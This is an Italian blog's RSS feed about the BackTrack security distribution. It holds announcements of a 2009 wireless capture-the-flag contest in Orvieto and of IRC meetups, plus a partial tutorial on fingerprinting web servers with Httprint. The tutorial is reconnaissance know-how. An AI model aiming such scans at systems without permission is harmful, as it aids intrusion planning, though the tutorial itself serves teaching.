<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>«back&#124;track~blog</title>
	<atom:link href="http://carlitobrigante.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://carlitobrigante.wordpress.com</link>
	<description>Luogo di studio della security-distro  BackTrack GNU/Linux</description>
	<lastBuildDate>Thu, 18 Jun 2009 17:35:11 +0000</lastBuildDate>
	<generator>http://wordpress.com/</generator>
	<language>it</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<cloud domain='carlitobrigante.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://www.gravatar.com/blavatar/151ab79cdd13eafaa57ed2702573287c?s=96&#038;d=http://s.wordpress.com/i/buttonw-com.png</url>
		<title>«back&#124;track~blog</title>
		<link>http://carlitobrigante.wordpress.com</link>
	</image>
			<item>
		<title>CAT-2009 Orvieto &#8211; Cracca Al Tesoro -</title>
		<link>http://carlitobrigante.wordpress.com/2009/06/18/cat-2009-orvieto-cracca-al-tesoro/</link>
		<comments>http://carlitobrigante.wordpress.com/2009/06/18/cat-2009-orvieto-cracca-al-tesoro/#comments</comments>
		<pubDate>Thu, 18 Jun 2009 06:06:22 +0000</pubDate>
		<dc:creator>brigante~</dc:creator>
				<category><![CDATA[/BackTrack-it]]></category>
		<category><![CDATA[/General]]></category>

		<guid isPermaLink="false">http://carlitobrigante.wordpress.com/?p=747</guid>
		<description><![CDATA[
***
Riprendo come dal forum , il post di emgent&#8230;  &#8230;che nessuno pensi di poter mancare  
Segnatevi in agenda l’appuntamento:   Orvieto sabato 11 luglio 2009.

CAT 2009 &#8211; Cracca Al Tesoro è l’«hack contest» che per la prima volta in Italia viene portato all’interno di un contesto cittadino: Orvieto.
Perché Orvieto?
E’ una città che si può girare [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=747&subd=carlitobrigante&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><img class="aligncenter size-full wp-image-745" title="4543_1166033234784_1346516551_448987_6075359_n" src="http://carlitobrigante.files.wordpress.com/2009/06/4543_1166033234784_1346516551_448987_6075359_n.jpg?w=460&#038;h=381" alt="4543_1166033234784_1346516551_448987_6075359_n" width="460" height="381" /></p>
<p style="text-align:center;">***</p>
<p>Riprendo come dal <a href="http://forums.remote-exploit.org/cat-2009-orvieto-cracca-al-tesoro/23539-cat-2009-orvieto-cracca-al-tesoro-backtrack-italia-conference.html" target="_blank"><strong>forum</strong></a> , il post di <strong>emgent</strong>&#8230;  &#8230;che nessuno pensi di poter mancare <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Segnatevi in agenda l’appuntamento:   <strong>Orvieto sabato 11 luglio 2009.</strong><br />
<strong><br />
CAT 2009 &#8211; Cracca Al Tesoro</strong> è l’«<em>hack contest</em>» che per la prima volta in Italia viene portato all’interno di un contesto cittadino: Orvieto.</p>
<p><strong>Perché Orvieto?</strong></p>
<p>E’ una città che si può girare a piedi facilmente (misura 1,5 km di lunghezza per 700 m di larghezza), i residenti sono affabili, cordiali, disarmanti nella loro semplicità e la città è una fortezza naturale rimasta inviolata per alcuni secoli in un passato remoto. <img title="Wink" src="http://forums.remote-exploit.org/images/smilies/wink.gif" border="0" alt="" /></p>
<p>Cracca Al Tesoro non sarà solo un contest ma una giornata unica con un mix inusuale: tecnologia, sicurezza, hacking si mescoleranno alle tradizioni, alla cultura e alla storia di una delle più belle città dell’Umbria.</p>
<p>Nerds, geeks ed esperti scorrazzeranno per la città armati di notebook e antenne direzionali seguiti dagli sguardi curiosi e dalle escamazioni dei residenti, dei negozianti e dei numerosi turisti provenienti da tutto il mondo.<br />
<strong><br />
In concreto di cosa si tratta?</strong></p>
<p>E’ un “Hacking Game”.</p>
<p>Un incrocio fra un “Capture the Flag”, una caccia al tesoro ed il wardriving, nel più puro spirito hacker.</p>
<p>All’interno del centro storico di Orvieto verranno posizionati una serie di access point wireless.</p>
<p>I partecipanti, a squadre, dovranno a partire da un indizio iniziale, individuare il primo access point, violarlo, “bucare” l’eventuale sistema collegato per trovare l’indizio che porta al successivo access point, fino al bersaglio finale.</p>
<p>La vittoria si raggiunge, quindi, superando una serie di ostacoli posizionati in luoghi differenti, che dovranno essere individuate dai partecipanti come parte del gioco.</p>
<p>Il gioco sarà la parte “visibile” della conferenza nazionale degli sviluppatori di backtrack, una distribuzione Linux gratuita per chi si occupa di Sicurezza Informatica.</p>
<p>Hack contest, capture the flag, wardriving (nelle sue varianti) sono modelli oltremodo diffusi. In ogni “convention hacker” che si rispetti c’e’ un “CTF” (Capture the Flag) contest: noi abbiamo voluto proporre un format diverso, unico ed innovativo.</p>
<p><strong>Venite ad Orvieto, vi aspettiamo!!!!</strong></p>
<p><strong>Le pre-iscrizioni saranno aperte da sabato 20 giugno e si chiuderanno domenica  5 luglio.</strong></p>
<p>maggiori informazioni su: <strong>www (punto) wardriving (punto) it</strong></p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/carlitobrigante.wordpress.com/747/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/carlitobrigante.wordpress.com/747/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/carlitobrigante.wordpress.com/747/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/carlitobrigante.wordpress.com/747/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/carlitobrigante.wordpress.com/747/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/carlitobrigante.wordpress.com/747/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/carlitobrigante.wordpress.com/747/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/carlitobrigante.wordpress.com/747/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/carlitobrigante.wordpress.com/747/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/carlitobrigante.wordpress.com/747/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=747&subd=carlitobrigante&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://carlitobrigante.wordpress.com/2009/06/18/cat-2009-orvieto-cracca-al-tesoro/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">~br1g4nt3~</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2009/06/4543_1166033234784_1346516551_448987_6075359_n.jpg" medium="image">
			<media:title type="html">4543_1166033234784_1346516551_448987_6075359_n</media:title>
		</media:content>

		<media:content url="http://forums.remote-exploit.org/images/smilies/wink.gif" medium="image">
			<media:title type="html">Wink</media:title>
		</media:content>
	</item>
		<item>
		<title>nuovo Meet-irc per BackTrack-[IT]</title>
		<link>http://carlitobrigante.wordpress.com/2009/06/01/nuovo-meet-irc-per-backtrack-it/</link>
		<comments>http://carlitobrigante.wordpress.com/2009/06/01/nuovo-meet-irc-per-backtrack-it/#comments</comments>
		<pubDate>Mon, 01 Jun 2009 05:52:11 +0000</pubDate>
		<dc:creator>brigante~</dc:creator>
				<category><![CDATA[/BackTrack-it]]></category>
		<category><![CDATA[/News]]></category>
		<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://carlitobrigante.wordpress.com/?p=736</guid>
		<description><![CDATA[
Ciao a tutti,


sono quì a presentarvi il nuovo meet-irc che riguarda la nostra community&#8230;


Come da mailinglist vi riporto il testo , invitandovi ad iscrivervi indicando il vostro nickname nel form.
ciao a tutti.    
****************************************
Come da titolo, si farà il giorno:
Mercoledì 10.06.2009
alle   ore 22:00
il nuovo meet-irc della nostra comunità.
È importante essere presenti , discuteremo delle [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=736&subd=carlitobrigante&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><img class="aligncenter size-full wp-image-738" title="irc" src="http://carlitobrigante.files.wordpress.com/2009/06/irc.png?w=310&#038;h=226" alt="irc" width="310" height="226" /></p>
<p><em>Ciao a tutti,</em></p>
<p><em><br />
</em></p>
<p><em>sono quì a presentarvi il nuovo meet-irc che riguarda la nostra community&#8230;</em></p>
<p><em><br />
</em></p>
<p><em>Come da mailinglist vi riporto il testo , invitandovi ad iscrivervi indicando il vostro nickname nel form.</em></p>
<p>ciao a tutti.   <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>****************************************</p>
<p><span style="text-decoration:underline;">Come da titolo, si farà il giorno:</span></p>
<p style="text-align:center;"><strong>Mercoledì 10.06.2009</strong><br />
alle   <strong>ore 22:00</strong></p>
<p>il nuovo meet-irc della nostra comunità.</p>
<p>È importante essere presenti , discuteremo delle nuove prospettive e<br />
materie riguardanti:</p>
<p>- 1 -<br />
<span style="text-decoration:underline;">il nuovo forum   ed   il nuovo wiki</span></p>
<p>- gli editori, come partecipare , lineeguida da assumere e<br />
regolamento del forum da rispettare -.</p>
<p>- 2 -<br />
<span style="text-decoration:underline;">il contest &amp; conference<br />
</span></p>
<p>-Il contest del 11.07.2009 ad Orvieto (TR) , che precluderà una<br />
presentazione al pubblico del progetto internazionale di BackTrack -<br />
remote-exploit.org e del progetto riguardante la comunità italiana e<br />
le sue future prospettive.<br />
Verrà ovviamente relazionata tutta la giornata sul contest e le sue<br />
specifiche.-</p>
<p>- 3 -</p>
<p><span style="text-decoration:underline;">varie ed eventuali</span></p>
<p>-Eventuali richieste e chiarimenti da parte di tutti i membri della<br />
comunità.-</p>
<p style="text-align:center;">***</p>
<p><em>A scopo esclusivamente di adesione, è necessario compilare il seguente<br />
form con il solo nickname:</em></p>
<p style="text-align:center;">***</p>
<p>****************************</p>
<p>nickname:   __________</p>
<p>****************************</p>
<p>grazie a tutti.</p>
<p style="text-align:center;"><strong>«Back|Track-[IT]</strong></p>
<p>****************************************</p>
<p>come sempre:</p>
<p style="text-align:center;">on    <strong>irc.freenode.net     /join   #backtrack.it</strong></p>
<p style="text-align:center;">
<p style="text-align:center;"><span style="text-decoration:underline;">Per i non iscritti alla nuova mailinglist potete visitare il gruppo tramite il link alla destra del blog</span></p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/carlitobrigante.wordpress.com/736/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/carlitobrigante.wordpress.com/736/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/carlitobrigante.wordpress.com/736/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/carlitobrigante.wordpress.com/736/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/carlitobrigante.wordpress.com/736/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/carlitobrigante.wordpress.com/736/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/carlitobrigante.wordpress.com/736/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/carlitobrigante.wordpress.com/736/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/carlitobrigante.wordpress.com/736/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/carlitobrigante.wordpress.com/736/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=736&subd=carlitobrigante&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://carlitobrigante.wordpress.com/2009/06/01/nuovo-meet-irc-per-backtrack-it/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">~br1g4nt3~</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2009/06/irc.png" medium="image">
			<media:title type="html">irc</media:title>
		</media:content>
	</item>
		<item>
		<title>primo meet irc per backtrack.it</title>
		<link>http://carlitobrigante.wordpress.com/2009/05/12/primo-meet-irc-per-backtrack-it/</link>
		<comments>http://carlitobrigante.wordpress.com/2009/05/12/primo-meet-irc-per-backtrack-it/#comments</comments>
		<pubDate>Tue, 12 May 2009 22:07:22 +0000</pubDate>
		<dc:creator>brigante~</dc:creator>
				<category><![CDATA[/BackTrack-it]]></category>
		<category><![CDATA[/News]]></category>

		<guid isPermaLink="false">http://carlitobrigante.wordpress.com/?p=722</guid>
		<description><![CDATA[
***
Ciao a tutti,
eccomi quì a presentarvi la data del primo meet della nostra community.
la riunione si terrà Martedì 19.05.2009 alle ore 22.
Si inizieranno a delineare le prime vie che formeranno le basi della nostra comunità.
irc.freenode     /join #backtrack.it
Esserci è un dovere.
Ricordo che se avete degli argomenti da proporre o delle particolari richieste scrivete nella mailinglist
backtrack-italia (-@-) [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=722&subd=carlitobrigante&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><a href="http://backtrack-italia.blogspot.com/2009/05/martedi-19-maggio-2009-ore-2200.html"><img class="aligncenter size-full wp-image-730" title="mainpaage_bluehhh" src="http://carlitobrigante.files.wordpress.com/2009/05/mainpaage_bluehhh.jpg?w=305&#038;h=285" alt="mainpaage_bluehhh" width="305" height="285" /></a></p>
<p style="text-align:center;"><strong>***</strong></p>
<p>Ciao a tutti,</p>
<p>eccomi quì a presentarvi la data del primo meet della nostra community.</p>
<p>la riunione si terrà <strong>Martedì 19.05.2009 </strong>alle ore <strong>22</strong>.</p>
<p>Si inizieranno a delineare le prime vie che formeranno le basi della nostra comunità.</p>
<p><strong>irc.freenode     /join #backtrack.it</strong></p>
<p>Esserci è un dovere.</p>
<p>Ricordo che se avete degli argomenti da proporre o delle particolari richieste scrivete nella mailinglist</p>
<p><strong>backtrack-italia (-@-) googlegroups.com</strong></p>
<p>***<br />
<strong>www.backtrack.it</strong></p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/carlitobrigante.wordpress.com/722/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/carlitobrigante.wordpress.com/722/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/carlitobrigante.wordpress.com/722/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/carlitobrigante.wordpress.com/722/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/carlitobrigante.wordpress.com/722/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/carlitobrigante.wordpress.com/722/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/carlitobrigante.wordpress.com/722/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/carlitobrigante.wordpress.com/722/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/carlitobrigante.wordpress.com/722/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/carlitobrigante.wordpress.com/722/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=722&subd=carlitobrigante&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://carlitobrigante.wordpress.com/2009/05/12/primo-meet-irc-per-backtrack-it/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">~br1g4nt3~</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2009/05/mainpaage_bluehhh.jpg" medium="image">
			<media:title type="html">mainpaage_bluehhh</media:title>
		</media:content>
	</item>
		<item>
		<title>Back&#124;Track &#8211; la comunità italiana</title>
		<link>http://carlitobrigante.wordpress.com/2009/05/10/backtrack-la-comunita-italiana/</link>
		<comments>http://carlitobrigante.wordpress.com/2009/05/10/backtrack-la-comunita-italiana/#comments</comments>
		<pubDate>Sun, 10 May 2009 07:55:59 +0000</pubDate>
		<dc:creator>brigante~</dc:creator>
				<category><![CDATA[/BackTrack-it]]></category>
		<category><![CDATA[/News]]></category>
		<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://carlitobrigante.wordpress.com/?p=698</guid>
		<description><![CDATA[
***
Ciao a tutti,
quello che sto per farvi è un annuncio per il quale già da tempo stavamo lavorando.
Come avete potuto notare da molto non scriviamo più sul blog , questo , chi ci ha sempre seguito ne è già al corrente , è dovuto al fatto che stavamo già lavorando ad un progetto che racchiudesse [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=698&subd=carlitobrigante&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><a title="backtrack.it" href="http://www.backtrack.it/" target="_blank"><img class="aligncenter size-full wp-image-704" title="btit" src="http://carlitobrigante.files.wordpress.com/2009/05/btit.jpg?w=390&#038;h=261" alt="btit" width="390" height="261" /></a></p>
<p style="text-align:center;"><strong>***</strong></p>
<p>Ciao a tutti,</p>
<p>quello che sto per farvi è un annuncio per il quale già da tempo stavamo lavorando.</p>
<p>Come avete potuto notare da molto non scriviamo più sul blog , questo , chi ci ha sempre seguito ne è già al corrente , è dovuto al fatto che stavamo già lavorando ad un progetto che racchiudesse dei portali da raccogliere sotto il dominio <strong>backtrack-it.net</strong> , creando così una community italiana a riguardo della distro che tanto ci ha appassionato e che tutt&#8217; oggi ci appassiona.</p>
<p>La BackTrack già dai primi tempi si è mostrata subito come il top tra le security-distro , la crescita che ha avuto , sia come utenza che come sviluppo , è stata esponenziale ,  a tal punto da far sì che ai vari livelli nazionali , proprio come nel nostro caso , si andassero già designando dei gruppi di utenti intenzionati a creare comunità nella propria lingua , basta guardare l&#8217; esempio , da me sempre ripreso , degli amici di <a href="http://www.backtrack-fr.net" target="_blank"><strong>backtrack-fr</strong></a>.</p>
<p>Durante il nostro cammino per la creazione della comunità italiana sulla distro , un&#8217;altra realtà , portata avanti da <a href="http://it.emgent.org/" target="_blank"><strong>Emanuele Gentili</strong></a> (<em>developper di BackTrack</em>) , stava nascendo.</p>
<p>Chi ci ha seguito e ci conosce ,  sà benissimo che non è mai stato nostro interesse fare utenza o portare avanti un &#8220;nostro&#8221; progetto personale , il nostro interesse è stato ed è solo la creazione di una comunità di appassionati totalmente italiana dedicata alla BackTrack.</p>
<p style="text-align:center;"><strong>Abbiamo quindi deciso di unire le nostre anime e portare avanti così un progetto comune , quello della comunità italiana ufficiale sulla BackTrack.</strong></p>
<p>Non rinnoverò quindi il dominio <span style="text-decoration:underline;">www.backtrack-it.net</span> , per quanto riguarda la costituzione del forum e del wiki vi farò sapere al più presto aggiornando quest&#8217; articolo.</p>
<p style="text-align:center;"><span style="text-decoration:underline;"><strong>ATTENZIONE:</strong></span></p>
<p><em>L&#8217; attuale <strong>mailinglist</strong> verrà mantenuta fino a quando tutti i membri non saranno passati alla nuova , ma tutti gli argomenti saranno automaticamente fatti spostare sulla nuova.</em></p>
<p><em>Il canale <strong>irc</strong> presente su <strong>Azzurra.org</strong> verrà mantenuto per direzionare gli utenti nel nuovo canale su <strong>Freenode</strong>.</em></p>
<p style="text-align:center;"><span style="text-decoration:underline;"><strong>Ecco quindi i nuovi indirizzi a cui fare riferimento:</strong></span></p>
<p><em><span style="text-decoration:underline;">questa la pagina del portale :</span></em></p>
<p><em><span style="text-decoration:underline;"></p>
<p></span></em></p>
<p style="text-align:center;"><a href="http://www.backtrack.it/" target="_blank"><strong>www.backtrack.it</strong></a></p>
<p style="text-align:center;">
<p><span style="text-decoration:underline;"><em>questa la pagina della mailinglist su googlegroups , alla quale vi invito subito ad iscrivervi per organizzarci e sapere al più presto tutte le novità :</em></span></p>
<p><span style="text-decoration:underline;"><em></p>
<p></em></span></p>
<p style="text-align:center;"><strong> <a href="http://groups.google.com/group/backtrack-italia" target="_blank">backtrack-italia</a></strong></p>
<p style="text-align:center;">
<p style="text-align:center;"><span style="text-decoration:underline;">Il nuovo canale Irc è       <strong>#backtrack.it </strong> su<strong> </strong><strong>Freenode</strong></span></p>
<p style="text-align:center;">
<p style="text-align:center;">
<p style="text-align:center;">per qualsiasi dubbio o altro  scrivete nella mailinglist, accedete pure dal banner a destra del blog <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p style="text-align:center;">oppure  <strong>brigante(-@-)backtrack.it</strong></p>
<p style="text-align:center;">
<p style="text-align:left;">Alla prossima.</p>
<p style="text-align:left;"><strong><a href="http://groups.google.com/group/backtrack-italia" target="_blank"></a></strong></p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/carlitobrigante.wordpress.com/698/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/carlitobrigante.wordpress.com/698/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/carlitobrigante.wordpress.com/698/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/carlitobrigante.wordpress.com/698/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/carlitobrigante.wordpress.com/698/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/carlitobrigante.wordpress.com/698/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/carlitobrigante.wordpress.com/698/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/carlitobrigante.wordpress.com/698/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/carlitobrigante.wordpress.com/698/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/carlitobrigante.wordpress.com/698/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=698&subd=carlitobrigante&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://carlitobrigante.wordpress.com/2009/05/10/backtrack-la-comunita-italiana/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">~br1g4nt3~</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2009/05/btit.jpg" medium="image">
			<media:title type="html">btit</media:title>
		</media:content>
	</item>
		<item>
		<title>Httprint &#8211; webserver fingerprinting</title>
		<link>http://carlitobrigante.wordpress.com/2008/09/28/httprint-server-web-fingerprinting/</link>
		<comments>http://carlitobrigante.wordpress.com/2008/09/28/httprint-server-web-fingerprinting/#comments</comments>
		<pubDate>Sun, 28 Sep 2008 08:10:48 +0000</pubDate>
		<dc:creator>redbar0n</dc:creator>
				<category><![CDATA[/Information-Gathering]]></category>
		<category><![CDATA[/Network-Mapping]]></category>
		<category><![CDATA[fingerprinting]]></category>
		<category><![CDATA[GUI]]></category>
		<category><![CDATA[httprint]]></category>
		<category><![CDATA[webserver]]></category>

		<guid isPermaLink="false">http://carlitobrigante.wordpress.com/?p=631</guid>
		<description><![CDATA[
***
Ciao a tutti,
eccoci di nuovo tornati a parlare di Finferprinting e questa volta lo faremo a riguardo di un tool molto particolare &#8230;l&#8217; HTTPrint.
Httprint è un tool per l&#8217;information-gathering di web servers sviluppato dal team Net-Square.
In BackTrack-3.Final è preinstallata la versione 301, in modalità GUI e da linea di comando (le due ovviamente svolgono le [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=631&subd=carlitobrigante&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><a href="http://carlitobrigante.files.wordpress.com/2008/09/_httprint.gif"><img class="aligncenter size-full wp-image-632" title="_httprint" src="http://carlitobrigante.files.wordpress.com/2008/09/_httprint.gif?w=288&#038;h=106" alt="" width="288" height="106" /></a></p>
<p style="text-align:center;"><strong>***</strong></p>
<p>Ciao a tutti,</p>
<p>eccoci di nuovo tornati a parlare di <em>Finferprinting</em> e questa volta lo faremo a riguardo di un tool molto particolare &#8230;l&#8217; <strong>HTTPrint</strong>.</p>
<p><span style="text-decoration:underline;"><strong>Httprint</strong></span> è un tool per <strong>l&#8217;information-gathering di web servers</strong> sviluppato dal team <a href="http://www.net-square.com/index.shtml"><strong><em><span style="color:#0000ff;">Net-Square</span></em></strong></a>.</p>
<p>In <strong>BackTrack-3.Final </strong>è preinstallata la versione <em>301</em>, in modalità <span style="text-decoration:underline;"><strong>GUI</strong></span> e da <strong><span style="text-decoration:underline;">linea di comando</span></strong> (le due ovviamente svolgono le stesse funzioni).</p>
<p style="text-align:left;"><strong><span style="text-decoration:underline;">Httprint</span></strong> utilizza le caratteristiche dei web servers per identificarli, e tenta di farlo nonostante offuscamenti vari o mediante l&#8217;utilizzo di plugins come mod_security o servermask (che servono appunto a mascherare il  web-server in questione).</p>
<p style="text-align:left;">Il tool, per adempiere a ciò, utilizza delle stringhe di testo che vengono confrontate con le stringhe di risposta ottenute in rete, da ciò scaturisce il risultato; è inoltre molto semplice aggiungere altre stringhe al database predefinito di Httprint modificando il file di testo apposito o utlizzando un database più aggiornato.</p>
<p style="text-align:center;">***</p>
<p style="text-align:left;">Per utilizzare il tool in modalità CLI dobbiamo selezionare dal menu <strong><em><span style="color:#000000;">Backtrack&gt;Network Mapping&gt;Service Fingerprinting&gt;Httprint</span></em></strong><br />
oppure da shell:</p>
<p style="text-align:left;">______________________________________________________</p>
<p style="text-align:left;"><strong><span style="color:#0000ff;">#cd /pentest/enumeration/www/httprint_301/linux<br />
# httprint</span></strong></p>
<p style="text-align:left;">______________________________________________________</p>
<p style="text-align:left;">Per utilizzare invece la modalità GUI del tool dobbiamo selezionarlo dal percorso:</p>
<p style="text-align:left;">______________________________________________________</p>
<p style="text-align:left;"><strong>Backtrack &#8211;&gt;Network Mapping &#8211;&gt; Service Fingerprinting &#8211;&gt; Httprint_GUI</strong>,</p>
<p style="text-align:left;">______________________________________________________</p>
<p style="text-align:left;">Per comodità useremo per il nostro test l&#8217; interfaccia grafica.<br />
La prima cosa che si consiglia di fare prima di utilizzare il tool è di <em><span style="text-decoration:underline;">aggiornare il database delle signatures</span></em> sovrascrivendolo con quello più recente.</p>
<p style="text-align:left;">Il database lo troviamo nella directory:</p>
<p style="text-align:left;"><em></em><strong>/pentest/enumeration/www/httprint_301/linux/</strong></p>
<p style="text-align:left;">il nome è <span style="text-decoration:underline;"><strong>&#8220;signatures.txt&#8221;</strong></span><br />
<em>Scarichiamo</em> il file aggiornato da questo indirizzo: <em><span style="text-decoration:underline;">http://www.net-square.com/httprint/signatures.txt</span></em><br />
e <em>sovrascriviamolo</em> a quello più datato.<br />
Ora dobbiamo creare il nostro file di input nel quale specificheremo gli obbiettivi che il tool dovrà analizzare.</p>
<p style="text-align:left;">Il file di input , (<em><strong>input.txt</strong></em>) , si trova nella stessa destinazione di signatures.txt dunque:</p>
<p style="text-align:left;"><span style="text-decoration:underline;"><em>/pentest/enumeration/www/httprint_301/linux</em></span></p>
<p style="text-align:left;">Apriamo il file <span style="text-decoration:underline;"><strong>input.txt</strong></span> con l&#8217;editor e dovrebbe apparire qualcosa del genere:</p>
<p style="text-align:center;"><strong>***</strong></p>
<p><span style="color:#ff0000;"># inputs for httprint can be:<br />
# &#8211; individual IP addresses (default port 80)<br />
# &#8211; http://servername:[port]/<br />
# &#8211; https://servername:[port]/<br />
# &#8211; IP ranges xx.xx.xx.xx-yy.yy.yy.yy<br />
#<br />
http://www.apache.org/</span></p>
<p style="text-align:center;"><strong>***</strong></p>
<p>Come possiamo vedere da questo file HTTPrint accetta diversi tipi di input i quali, qualora fossero più di uno, potrebbero essere anche analizzati contemporaneamente dato che<strong> ha la possibilità di lavorare su più bersagli in modo parallelo</strong>.</p>
<p>Noi faremo delle prove su un solo bersaglio.</p>
<p>L&#8217;host da voi designato dunque dovrà essere sovrascritto al posto di <em><strong>www.apache.org</strong></em>, noi useremo <strong>google.com</strong> e <strong>apache.org</strong>.<br />
Non ci resta che <em><span style="text-decoration:underline;">aprire Httprint_GUI</span></em>. Fatto ciò possiamo notare che <em><span style="text-decoration:underline;">Httprint</span></em> non <em><span style="text-decoration:underline;">accetta</span></em> come input solo files .txt ma anche <em><span style="text-decoration:underline;">files di tipo .xml creati dal famoso tool <strong>nmap</strong></span></em>, [(<a href="http://nmap.org/"><strong>1</strong></a>) - (<a href="http://carlitobrigante.wordpress.com/2008/02/13/nmap-network-mapping/"><strong>2</strong></a>)] , è infatti selezionabile questa opzione nella finestra principale; in seguito proveremo anche questa possibilità.<br />
Diamo uno sguardo ora alla parte centrale della GUI dove possiamo osservare le seguenti voci:<br />
<strong><span style="color:#ff0000;"><em><span style="text-decoration:underline;">Host ; Port ; Banner-Reported ; Banner-Deduced ; Confidence</span></em></span></strong><br />
